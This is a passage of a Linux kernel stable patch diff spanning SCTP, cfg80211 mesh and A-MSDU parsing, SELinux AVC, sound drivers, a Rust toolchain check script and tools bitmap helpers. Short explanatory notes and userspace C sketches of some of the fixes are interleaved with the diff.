+ 	 */
+ 	if (queue->in_progress) {
+-		sctp_chunk_free(queue->in_progress);
++		sctp_inq_chunk_free(queue->in_progress);
+ 		queue->in_progress = NULL;
+ 	}
+ }
+@@ -130,9 +138,7 @@ struct sctp_chunk *sctp_inq_pop(struct sctp_inq *queue)
+ 				goto new_skb;
+ 			}
+ 
+-			if (chunk->head_skb)
+-				chunk->skb = chunk->head_skb;
+-			sctp_chunk_free(chunk);
++			sctp_inq_chunk_free(chunk);
+ 			chunk = queue->in_progress = NULL;
+ 		} else {
+ 			/* Nothing to do. Next chunk in the packet, please. */
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index ee980965a7cfb..8118b8614ac68 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -228,6 +228,7 @@ void cfg80211_register_wdev(struct cfg80211_registered_device *rdev,
+ static inline void wdev_lock(struct wireless_dev *wdev)
+ 	__acquires(wdev)
+ {
++	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	mutex_lock(&wdev->mtx);
+ 	__acquire(wdev->mtx);
+ }
+@@ -235,11 +236,16 @@ static inline void wdev_lock(struct wireless_dev *wdev)
+ static inline void wdev_unlock(struct wireless_dev *wdev)
+ 	__releases(wdev)
+ {
++	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	__release(wdev->mtx);
+ 	mutex_unlock(&wdev->mtx);
+ }
+ 
+-#define ASSERT_WDEV_LOCK(wdev) lockdep_assert_held(&(wdev)->mtx)
++static inline void ASSERT_WDEV_LOCK(struct wireless_dev *wdev)
++{
++	lockdep_assert_held(&wdev->wiphy->mtx);
++	lockdep_assert_held(&wdev->mtx);
++}
+ 
+ static inline bool cfg80211_has_monitors_only(struct cfg80211_registered_device *rdev)
+ {
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 1665320d22146..c71b85fd6052d 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -542,6 +542,66 @@ unsigned int ieee80211_get_mesh_hdrlen(struct ieee80211s_hdr *meshhdr)
+ }
+ EXPORT_SYMBOL(ieee80211_get_mesh_hdrlen);
+ 
++bool ieee80211_get_8023_tunnel_proto(const void *hdr, __be16 *proto)
++{
++	const __be16 *hdr_proto = hdr + ETH_ALEN;
++
++	if (!(ether_addr_equal(hdr, rfc1042_header) &&
++	      *hdr_proto != htons(ETH_P_AARP) &&
++	      *hdr_proto != htons(ETH_P_IPX)) &&
++	    !ether_addr_equal(hdr, bridge_tunnel_header))
++		return false;
++
++	*proto = *hdr_proto;
++
++	return true;
++}
++EXPORT_SYMBOL(ieee80211_get_8023_tunnel_proto);
++
++int ieee80211_strip_8023_mesh_hdr(struct sk_buff *skb)
++{
++	const void *mesh_addr;
++	struct {
++		struct ethhdr eth;
++		u8 flags;
++	} payload;
++	int hdrlen;
++	int ret;
++
++	ret = skb_copy_bits(skb, 0, &payload, sizeof(payload));
++	if (ret)
++		return ret;
++
++	hdrlen = sizeof(payload.eth) + __ieee80211_get_mesh_hdrlen(payload.flags);
++
++	if (likely(pskb_may_pull(skb, hdrlen + 8) &&
++		   ieee80211_get_8023_tunnel_proto(skb->data + hdrlen,
++						   &payload.eth.h_proto)))
++		hdrlen += ETH_ALEN + 2;
++	else if (!pskb_may_pull(skb, hdrlen))
++		return -EINVAL;
++	else
++		payload.eth.h_proto = htons(skb->len - hdrlen);
++
++	mesh_addr = skb->data + sizeof(payload.eth) + ETH_ALEN;
++	switch (payload.flags & MESH_FLAGS_AE) {
++	case MESH_FLAGS_AE_A4:
++		memcpy(&payload.eth.h_source, mesh_addr, ETH_ALEN);
++		break;
++	case MESH_FLAGS_AE_A5_A6:
++		memcpy(&payload.eth, mesh_addr, 2 * ETH_ALEN);
++		break;
++	default:
++		break;
++	}
++
++	pskb_pull(skb, hdrlen - sizeof(payload.eth));
++	memcpy(skb->data, &payload.eth, sizeof(payload.eth));
++
++	return 0;
++}
++EXPORT_SYMBOL(ieee80211_strip_8023_mesh_hdr);
++
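
The new helper factors out the LLC/SNAP test: a header is treated as
carrying an encapsulated EtherType only if it is the RFC 1042 header
(excluding AARP and IPX, which must stay SNAP-encoded) or the bridge-tunnel
header. A self-contained userspace sketch of the same test; the constants
mirror the well-known headers, the function name is illustrative:

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const uint8_t rfc1042[6] = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00};
static const uint8_t br_tun[6]  = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0xf8};

static bool get_tunnel_proto(const uint8_t *hdr, uint16_t *proto)
{
	uint16_t p = (uint16_t)(hdr[6] << 8 | hdr[7]);	/* EtherType, BE */

	if (!(memcmp(hdr, rfc1042, 6) == 0 &&
	      p != 0x80f3 /* AARP */ && p != 0x8137 /* IPX */) &&
	    memcmp(hdr, br_tun, 6) != 0)
		return false;

	*proto = p;
	return true;
}

int main(void)
{
	uint8_t snap[8] = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00};
	uint16_t proto;

	if (get_tunnel_proto(snap, &proto))
		printf("EtherType 0x%04x\n", (unsigned)proto);	/* IPv4 */
	return 0;
}
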
+ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 				  const u8 *addr, enum nl80211_iftype iftype,
+ 				  u8 data_offset, bool is_amsdu)
+@@ -553,7 +613,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 	} payload;
+ 	struct ethhdr tmp;
+ 	u16 hdrlen;
+-	u8 mesh_flags = 0;
+ 
+ 	if (unlikely(!ieee80211_is_data_present(hdr->frame_control)))
+ 		return -1;
+@@ -574,12 +633,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 	memcpy(tmp.h_dest, ieee80211_get_DA(hdr), ETH_ALEN);
+ 	memcpy(tmp.h_source, ieee80211_get_SA(hdr), ETH_ALEN);
+ 
+-	if (iftype == NL80211_IFTYPE_MESH_POINT &&
+-	    skb_copy_bits(skb, hdrlen, &mesh_flags, 1) < 0)
+-		return -1;
+-
+-	mesh_flags &= MESH_FLAGS_AE;
+-
+ 	switch (hdr->frame_control &
+ 		cpu_to_le16(IEEE80211_FCTL_TODS | IEEE80211_FCTL_FROMDS)) {
+ 	case cpu_to_le16(IEEE80211_FCTL_TODS):
+@@ -593,17 +646,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 			     iftype != NL80211_IFTYPE_AP_VLAN &&
+ 			     iftype != NL80211_IFTYPE_STATION))
+ 			return -1;
+-		if (iftype == NL80211_IFTYPE_MESH_POINT) {
+-			if (mesh_flags == MESH_FLAGS_AE_A4)
+-				return -1;
+-			if (mesh_flags == MESH_FLAGS_AE_A5_A6 &&
+-			    skb_copy_bits(skb, hdrlen +
+-					  offsetof(struct ieee80211s_hdr, eaddr1),
+-					  tmp.h_dest, 2 * ETH_ALEN) < 0)
+-				return -1;
+-
+-			hdrlen += __ieee80211_get_mesh_hdrlen(mesh_flags);
+-		}
+ 		break;
+ 	case cpu_to_le16(IEEE80211_FCTL_FROMDS):
+ 		if ((iftype != NL80211_IFTYPE_STATION &&
+@@ -612,16 +654,6 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 		    (is_multicast_ether_addr(tmp.h_dest) &&
+ 		     ether_addr_equal(tmp.h_source, addr)))
+ 			return -1;
+-		if (iftype == NL80211_IFTYPE_MESH_POINT) {
+-			if (mesh_flags == MESH_FLAGS_AE_A5_A6)
+-				return -1;
+-			if (mesh_flags == MESH_FLAGS_AE_A4 &&
+-			    skb_copy_bits(skb, hdrlen +
+-					  offsetof(struct ieee80211s_hdr, eaddr1),
+-					  tmp.h_source, ETH_ALEN) < 0)
+-				return -1;
+-			hdrlen += __ieee80211_get_mesh_hdrlen(mesh_flags);
+-		}
+ 		break;
+ 	case cpu_to_le16(0):
+ 		if (iftype != NL80211_IFTYPE_ADHOC &&
+@@ -631,15 +663,11 @@ int ieee80211_data_to_8023_exthdr(struct sk_buff *skb, struct ethhdr *ehdr,
+ 		break;
+ 	}
+ 
+-	if (likely(skb_copy_bits(skb, hdrlen, &payload, sizeof(payload)) == 0 &&
+-	           ((!is_amsdu && ether_addr_equal(payload.hdr, rfc1042_header) &&
+-		     payload.proto != htons(ETH_P_AARP) &&
+-		     payload.proto != htons(ETH_P_IPX)) ||
+-		    ether_addr_equal(payload.hdr, bridge_tunnel_header)))) {
+-		/* remove RFC1042 or Bridge-Tunnel encapsulation and
+-		 * replace EtherType */
++	if (likely(!is_amsdu && iftype != NL80211_IFTYPE_MESH_POINT &&
++		   skb_copy_bits(skb, hdrlen, &payload, sizeof(payload)) == 0 &&
++		   ieee80211_get_8023_tunnel_proto(&payload, &tmp.h_proto))) {
++		/* remove RFC1042 or Bridge-Tunnel encapsulation */
+ 		hdrlen += ETH_ALEN + 2;
+-		tmp.h_proto = payload.proto;
+ 		skb_postpull_rcsum(skb, &payload, ETH_ALEN + 2);
+ 	} else {
+ 		tmp.h_proto = htons(skb->len - hdrlen);
+@@ -711,7 +739,8 @@ __ieee80211_amsdu_copy_frag(struct sk_buff *skb, struct sk_buff *frame,
+ 
+ static struct sk_buff *
+ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+-		       int offset, int len, bool reuse_frag)
++		       int offset, int len, bool reuse_frag,
++		       int min_len)
+ {
+ 	struct sk_buff *frame;
+ 	int cur_len = len;
+@@ -725,7 +754,7 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	 * in the stack later.
+ 	 */
+ 	if (reuse_frag)
+-		cur_len = min_t(int, len, 32);
++		cur_len = min_t(int, len, min_len);
+ 
+ 	/*
+ 	 * Allocate and reserve two bytes more for payload
+@@ -735,6 +764,7 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	if (!frame)
+ 		return NULL;
+ 
++	frame->priority = skb->priority;
+ 	skb_reserve(frame, hlen + sizeof(struct ethhdr) + 2);
+ 	skb_copy_bits(skb, offset, skb_put(frame, cur_len), cur_len);
+ 
+@@ -748,46 +778,96 @@ __ieee80211_amsdu_copy(struct sk_buff *skb, unsigned int hlen,
+ 	return frame;
+ }
+ 
++bool ieee80211_is_valid_amsdu(struct sk_buff *skb, bool mesh_hdr)
++{
++	int offset = 0, subframe_len, padding;
++
++	for (offset = 0; offset < skb->len; offset += subframe_len + padding) {
++		int remaining = skb->len - offset;
++		struct {
++		    __be16 len;
++		    u8 mesh_flags;
++		} hdr;
++		u16 len;
++
++		if (sizeof(hdr) > remaining)
++			return false;
++
++		if (skb_copy_bits(skb, offset + 2 * ETH_ALEN, &hdr, sizeof(hdr)) < 0)
++			return false;
++
++		if (mesh_hdr)
++			len = le16_to_cpu(*(__le16 *)&hdr.len) +
++			      __ieee80211_get_mesh_hdrlen(hdr.mesh_flags);
++		else
++			len = ntohs(hdr.len);
++
++		subframe_len = sizeof(struct ethhdr) + len;
++		padding = (4 - subframe_len) & 0x3;
++
++		if (subframe_len > remaining)
++			return false;
++	}
++
++	return true;
++}
++EXPORT_SYMBOL(ieee80211_is_valid_amsdu);
++
+ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			      const u8 *addr, enum nl80211_iftype iftype,
+ 			      const unsigned int extra_headroom,
+-			      const u8 *check_da, const u8 *check_sa)
++			      const u8 *check_da, const u8 *check_sa,
++			      bool mesh_control)
+ {
+ 	unsigned int hlen = ALIGN(extra_headroom, 4);
+ 	struct sk_buff *frame = NULL;
+-	u16 ethertype;
+-	u8 *payload;
+-	int offset = 0, remaining;
+-	struct ethhdr eth;
++	int offset = 0;
++	struct {
++		struct ethhdr eth;
++		uint8_t flags;
++	} hdr;
+ 	bool reuse_frag = skb->head_frag && !skb_has_frag_list(skb);
+ 	bool reuse_skb = false;
+ 	bool last = false;
++	int copy_len = sizeof(hdr.eth);
++
++	if (iftype == NL80211_IFTYPE_MESH_POINT)
++		copy_len = sizeof(hdr);
+ 
+ 	while (!last) {
++		int remaining = skb->len - offset;
+ 		unsigned int subframe_len;
+-		int len;
++		int len, mesh_len = 0;
+ 		u8 padding;
+ 
+-		skb_copy_bits(skb, offset, &eth, sizeof(eth));
+-		len = ntohs(eth.h_proto);
++		if (copy_len > remaining)
++			goto purge;
++
++		skb_copy_bits(skb, offset, &hdr, copy_len);
++		if (iftype == NL80211_IFTYPE_MESH_POINT)
++			mesh_len = __ieee80211_get_mesh_hdrlen(hdr.flags);
++		if (mesh_control)
++			len = le16_to_cpu(*(__le16 *)&hdr.eth.h_proto) + mesh_len;
++		else
++			len = ntohs(hdr.eth.h_proto);
++
+ 		subframe_len = sizeof(struct ethhdr) + len;
+ 		padding = (4 - subframe_len) & 0x3;
+ 
+ 		/* the last MSDU has no padding */
+-		remaining = skb->len - offset;
+ 		if (subframe_len > remaining)
+ 			goto purge;
+ 		/* mitigate A-MSDU aggregation injection attacks */
+-		if (ether_addr_equal(eth.h_dest, rfc1042_header))
++		if (ether_addr_equal(hdr.eth.h_dest, rfc1042_header))
+ 			goto purge;
+ 
+ 		offset += sizeof(struct ethhdr);
+ 		last = remaining <= subframe_len + padding;
+ 
+ 		/* FIXME: should we really accept multicast DA? */
+-		if ((check_da && !is_multicast_ether_addr(eth.h_dest) &&
+-		     !ether_addr_equal(check_da, eth.h_dest)) ||
+-		    (check_sa && !ether_addr_equal(check_sa, eth.h_source))) {
++		if ((check_da && !is_multicast_ether_addr(hdr.eth.h_dest) &&
++		     !ether_addr_equal(check_da, hdr.eth.h_dest)) ||
++		    (check_sa && !ether_addr_equal(check_sa, hdr.eth.h_source))) {
+ 			offset += len + padding;
+ 			continue;
+ 		}
+@@ -799,7 +879,7 @@ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			reuse_skb = true;
+ 		} else {
+ 			frame = __ieee80211_amsdu_copy(skb, hlen, offset, len,
+-						       reuse_frag);
++						       reuse_frag, 32 + mesh_len);
+ 			if (!frame)
+ 				goto purge;
+ 
+@@ -810,16 +890,11 @@ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 		frame->dev = skb->dev;
+ 		frame->priority = skb->priority;
+ 
+-		payload = frame->data;
+-		ethertype = (payload[6] << 8) | payload[7];
+-		if (likely((ether_addr_equal(payload, rfc1042_header) &&
+-			    ethertype != ETH_P_AARP && ethertype != ETH_P_IPX) ||
+-			   ether_addr_equal(payload, bridge_tunnel_header))) {
+-			eth.h_proto = htons(ethertype);
++		if (likely(iftype != NL80211_IFTYPE_MESH_POINT &&
++			   ieee80211_get_8023_tunnel_proto(frame->data, &hdr.eth.h_proto)))
+ 			skb_pull(frame, ETH_ALEN + 2);
+-		}
+ 
+-		memcpy(skb_push(frame, sizeof(eth)), &eth, sizeof(eth));
++		memcpy(skb_push(frame, sizeof(hdr.eth)), &hdr.eth, sizeof(hdr.eth));
+ 		__skb_queue_tail(list, frame);
+ 	}
+ 
+diff --git a/samples/bpf/map_perf_test_user.c b/samples/bpf/map_perf_test_user.c
+index 1bb53f4b29e11..cb5c776103b99 100644
+--- a/samples/bpf/map_perf_test_user.c
++++ b/samples/bpf/map_perf_test_user.c
+@@ -370,7 +370,7 @@ static void run_perf_test(int tasks)
+ 
+ static void fill_lpm_trie(void)
+ {
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	unsigned long value = 0;
+ 	unsigned int i;
+ 	int r;
+diff --git a/samples/bpf/xdp_router_ipv4_user.c b/samples/bpf/xdp_router_ipv4_user.c
+index 683913bbf2797..28bae295d0ed1 100644
+--- a/samples/bpf/xdp_router_ipv4_user.c
++++ b/samples/bpf/xdp_router_ipv4_user.c
+@@ -91,7 +91,7 @@ static int recv_msg(struct sockaddr_nl sock_addr, int sock)
+ static void read_route(struct nlmsghdr *nh, int nll)
+ {
+ 	char dsts[24], gws[24], ifs[16], dsts_len[24], metrics[24];
+-	struct bpf_lpm_trie_key *prefix_key;
++	struct bpf_lpm_trie_key_u8 *prefix_key;
+ 	struct rtattr *rt_attr;
+ 	struct rtmsg *rt_msg;
+ 	int rtm_family;
+diff --git a/scripts/rust_is_available.sh b/scripts/rust_is_available.sh
+index 7a925d2b20fc7..141644c164636 100755
+--- a/scripts/rust_is_available.sh
++++ b/scripts/rust_is_available.sh
+@@ -38,10 +38,21 @@ fi
+ # Check that the Rust compiler version is suitable.
+ #
+ # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`.
++rust_compiler_output=$( \
++	LC_ALL=C "$RUSTC" --version 2>/dev/null
++) || rust_compiler_code=$?
++if [ -n "$rust_compiler_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$RUSTC' to check the Rust compiler version failed with"
++	echo >&2 "*** code $rust_compiler_code. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$rust_compiler_output"
++	echo >&2 "***"
++	exit 1
++fi
+ rust_compiler_version=$( \
+-	LC_ALL=C "$RUSTC" --version 2>/dev/null \
+-		| head -n 1 \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
++	echo "$rust_compiler_output" \
++		| sed -nE '1s:.*rustc ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ rust_compiler_min_version=$($min_tool_version rustc)
+ rust_compiler_cversion=$(get_canonical_version $rust_compiler_version)
+@@ -65,10 +76,25 @@ fi
+ # Check that the Rust bindings generator is suitable.
+ #
+ # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`.
++#
++# The dummy parameter `workaround-for-0.69.0` is required to support 0.69.0
++# (https://github.com/rust-lang/rust-bindgen/pull/2678). It can be removed when
++# the minimum version is upgraded past that (0.69.1 already fixed the issue).
++rust_bindings_generator_output=$( \
++	LC_ALL=C "$BINDGEN" --version workaround-for-0.69.0 2>/dev/null
++) || rust_bindings_generator_code=$?
++if [ -n "$rust_bindings_generator_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$BINDGEN' to check the Rust bindings generator version failed with"
++	echo >&2 "*** code $rust_bindings_generator_code. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$rust_bindings_generator_output"
++	echo >&2 "***"
++	exit 1
++fi
+ rust_bindings_generator_version=$( \
+-	LC_ALL=C "$BINDGEN" --version 2>/dev/null \
+-		| head -n 1 \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
++	echo "$rust_bindings_generator_output" \
++		| sed -nE '1s:.*bindgen ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ rust_bindings_generator_min_version=$($min_tool_version bindgen)
+ rust_bindings_generator_cversion=$(get_canonical_version $rust_bindings_generator_version)
+@@ -110,6 +136,9 @@ fi
+ 
+ # `bindgen` returned successfully, thus use the output to check that the version
+ # of the `libclang` found by the Rust bindings generator is suitable.
++#
++# Unlike other version checks, note that this one does not necessarily appear
++# in the first line of the output, thus no `sed` address is provided.
+ bindgen_libclang_version=$( \
+ 	echo "$bindgen_libclang_output" \
+ 		| sed -nE 's:.*clang version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+diff --git a/security/selinux/avc.c b/security/selinux/avc.c
+index 9a43af0ebd7de..8984ba92676db 100644
+--- a/security/selinux/avc.c
++++ b/security/selinux/avc.c
+@@ -332,12 +332,12 @@ static int avc_add_xperms_decision(struct avc_node *node,
+ {
+ 	struct avc_xperms_decision_node *dest_xpd;
+ 
+-	node->ae.xp_node->xp.len++;
+ 	dest_xpd = avc_xperms_decision_alloc(src->used);
+ 	if (!dest_xpd)
+ 		return -ENOMEM;
+ 	avc_copy_xperms_decision(&dest_xpd->xpd, src);
+ 	list_add(&dest_xpd->xpd_list, &node->ae.xp_node->xpd_head);
++	node->ae.xp_node->xp.len++;
+ 	return 0;
+ }
+ 
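
The AVC fix is a pure ordering change: the externally visible length is now
incremented only after the allocation and list insertion have succeeded, so
an allocation failure can no longer leave xp.len one larger than the list.
A small userspace sketch of that publish-last pattern (names illustrative):

#include <stdio.h>
#include <stdlib.h>

struct node { struct node *next; };

static struct node *xpd_head;		/* stand-in for the xpd list */
static int xp_len;			/* stand-in for xp_node->xp.len */

static int add_xperms_decision(void)
{
	struct node *n = malloc(sizeof(*n));

	if (!n)
		return -1;		/* failure: xp_len untouched */
	n->next = xpd_head;		/* stand-in for list_add() */
	xpd_head = n;
	xp_len++;			/* bumped after every failure point */
	return 0;
}

int main(void)
{
	if (add_xperms_decision() == 0)
		printf("len=%d\n", xp_len);
	while (xpd_head) {
		struct node *n = xpd_head;

		xpd_head = n->next;
		free(n);
	}
	return 0;
}
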
+diff --git a/sound/core/timer.c b/sound/core/timer.c
+index 38f3b30efae70..ecad57a1bc5b8 100644
+--- a/sound/core/timer.c
++++ b/sound/core/timer.c
+@@ -556,7 +556,7 @@ static int snd_timer_start1(struct snd_timer_instance *timeri,
+ 	/* check the actual time for the start tick;
+ 	 * bail out as error if it's way too low (< 100us)
+ 	 */
+-	if (start) {
++	if (start && !(timer->hw.flags & SNDRV_TIMER_HW_SLAVE)) {
+ 		if ((u64)snd_timer_hw_resolution(timer) * ticks < 100000) {
+ 			result = -EINVAL;
+ 			goto unlock;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 93d65a1acc475..b942ed868070d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -583,7 +583,6 @@ static void alc_shutup_pins(struct hda_codec *codec)
+ 	switch (codec->core.vendor_id) {
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
+-	case 0x10ec0257:
+ 	case 0x19e58326:
+ 	case 0x10ec0283:
+ 	case 0x10ec0285:
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 06e1872abfee7..1449837b0fb2c 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -616,7 +616,14 @@ static void sof_ipc4_rx_msg(struct snd_sof_dev *sdev)
+ 			return;
+ 
+ 		ipc4_msg->data_size = data_size;
+-		snd_sof_ipc_msg_data(sdev, NULL, ipc4_msg->data_ptr, ipc4_msg->data_size);
++		err = snd_sof_ipc_msg_data(sdev, NULL, ipc4_msg->data_ptr, ipc4_msg->data_size);
++		if (err < 0) {
++			dev_err(sdev->dev, "failed to read IPC notification data: %d\n", err);
++			kfree(ipc4_msg->data_ptr);
++			ipc4_msg->data_ptr = NULL;
++			ipc4_msg->data_size = 0;
++			return;
++		}
+ 	}
+ 
+ 	sof_ipc4_log_header(sdev->dev, "ipc rx done ", ipc4_msg, true);
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 5699a62d17679..34ded71cb8077 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -2023,6 +2023,13 @@ static int parse_audio_feature_unit(struct mixer_build *state, int unitid,
+ 		bmaControls = ftr->bmaControls;
+ 	}
+ 
++	if (channels > 32) {
++		usb_audio_info(state->chip,
++			       "usbmixer: too many channels (%d) in unit %d\n",
++			       channels, unitid);
++		return -EINVAL;
++	}
++
+ 	/* parse the source unit */
+ 	err = parse_audio_unit(state, hdr->bSourceID);
+ 	if (err < 0)
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index af1b8cf5a9883..d2aa97a5c438c 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -273,6 +273,7 @@ YAMAHA_DEVICE(0x105a, NULL),
+ YAMAHA_DEVICE(0x105b, NULL),
+ YAMAHA_DEVICE(0x105c, NULL),
+ YAMAHA_DEVICE(0x105d, NULL),
++YAMAHA_DEVICE(0x1718, "P-125"),
+ {
+ 	USB_DEVICE(0x0499, 0x1503),
+ 	.driver_info = (unsigned long) & (const struct snd_usb_audio_quirk) {
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 733a25275fe9f..f9ba10d4f1e18 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2179,6 +2179,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2d95, 0x8021, /* VIVO USB-C-XE710 HEADSET */
++		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x30be, 0x0101, /* Schiit Hel */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x413c, 0xa506, /* Dell AE515 sound bar */
+diff --git a/tools/include/linux/align.h b/tools/include/linux/align.h
+new file mode 100644
+index 0000000000000..14e34ace80dda
+--- /dev/null
++++ b/tools/include/linux/align.h
+@@ -0,0 +1,12 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++
++#ifndef _TOOLS_LINUX_ALIGN_H
++#define _TOOLS_LINUX_ALIGN_H
++
++#include <uapi/linux/const.h>
++
++#define ALIGN(x, a)		__ALIGN_KERNEL((x), (a))
++#define ALIGN_DOWN(x, a)	__ALIGN_KERNEL((x) - ((a) - 1), (a))
++#define IS_ALIGNED(x, a)	(((x) & ((typeof(x))(a) - 1)) == 0)
++
++#endif /* _TOOLS_LINUX_ALIGN_H */
+diff --git a/tools/include/linux/bitmap.h b/tools/include/linux/bitmap.h
+index 65d0747c5205c..2cbabc1dcf0fd 100644
+--- a/tools/include/linux/bitmap.h
++++ b/tools/include/linux/bitmap.h
+@@ -3,6 +3,7 @@
+ #define _TOOLS_LINUX_BITMAP_H
+ 
+ #include <string.h>
++#include <linux/align.h>
+ #include <linux/bitops.h>
+ #include <linux/find.h>
+ #include <stdlib.h>
+@@ -25,13 +26,14 @@ bool __bitmap_intersects(const unsigned long *bitmap1,
+ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1)))
+ #define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1)))
+ 
++#define bitmap_size(nbits)	(ALIGN(nbits, BITS_PER_LONG) / BITS_PER_BYTE)
++
+ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ {
+ 	if (small_const_nbits(nbits))
+ 		*dst = 0UL;
+ 	else {
+-		int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
+-		memset(dst, 0, len);
++		memset(dst, 0, bitmap_size(nbits));
+ 	}
+ }
+ 
+@@ -117,7 +119,7 @@ static inline int test_and_clear_bit(int nr, unsigned long *addr)
+  */
+ static inline unsigned long *bitmap_zalloc(int nbits)
+ {
+-	return calloc(1, BITS_TO_LONGS(nbits) * sizeof(unsigned long));
++	return calloc(1, bitmap_size(nbits));
+ }
+ 
+ /*
+@@ -160,7 +162,6 @@ static inline bool bitmap_and(unsigned long *dst, const unsigned long *src1,
+ #define BITMAP_MEM_ALIGNMENT (8 * sizeof(unsigned long))
+ #endif
+ #define BITMAP_MEM_MASK (BITMAP_MEM_ALIGNMENT - 1)
+-#define IS_ALIGNED(x, a) (((x) & ((typeof(x))(a) - 1)) == 0)
+ 
+ static inline bool bitmap_equal(const unsigned long *src1,
+ 				const unsigned long *src2, unsigned int nbits)
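
The tools/ hunks consolidate the repeated "longs needed for nbits, in
bytes" computation behind a single bitmap_size() helper built on ALIGN(). A
userspace sketch of the arithmetic (macro names mirror the patch but are
defined locally here):

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define BITS_PER_LONG	(CHAR_BIT * sizeof(long))
#define ALIGN_UP(x, a)	(((x) + (a) - 1) / (a) * (a))
#define BITMAP_SIZE(nbits) (ALIGN_UP((size_t)(nbits), BITS_PER_LONG) / CHAR_BIT)

int main(void)
{
	for (unsigned int nbits = 1; nbits <= 129; nbits += 64)
		printf("%3u bits -> %2zu bytes\n",
		       nbits, (size_t)BITMAP_SIZE(nbits));

	/* bitmap_zalloc(100) becomes calloc(1, bitmap_size(100)) */
	unsigned long *map = calloc(1, BITMAP_SIZE(100));

	free(map);
	return 0;
}
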
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index 2f401e8c6c0bb..66ca5f9a0e093 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -2,8 +2,8 @@
+ #ifndef _TOOLS_LINUX_MM_H
+ #define _TOOLS_LINUX_MM_H
+ 
++#include <linux/align.h>
+ #include <linux/mmzone.h>
+-#include <uapi/linux/const.h>
+ 
+ #define PAGE_SHIFT		12
+ #define PAGE_SIZE		(_AC(1, UL) << PAGE_SHIFT)
+@@ -11,9 +11,6 @@
+ 
+ #define PHYS_ADDR_MAX	(~(phys_addr_t)0)
+ 
+-#define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+-#define ALIGN_DOWN(x, a)		__ALIGN_KERNEL((x) - ((a) - 1), (a))
+-
+ #define PAGE_ALIGN(addr) ALIGN(addr, PAGE_SIZE)
+ 
+ #define __va(x) ((void *)((unsigned long)(x)))
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index a17688011440e..58c7fc75da752 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -76,12 +76,29 @@ struct bpf_insn {
+ 	__s32	imm;		/* signed immediate constant */
+ };
+ 
+-/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry */
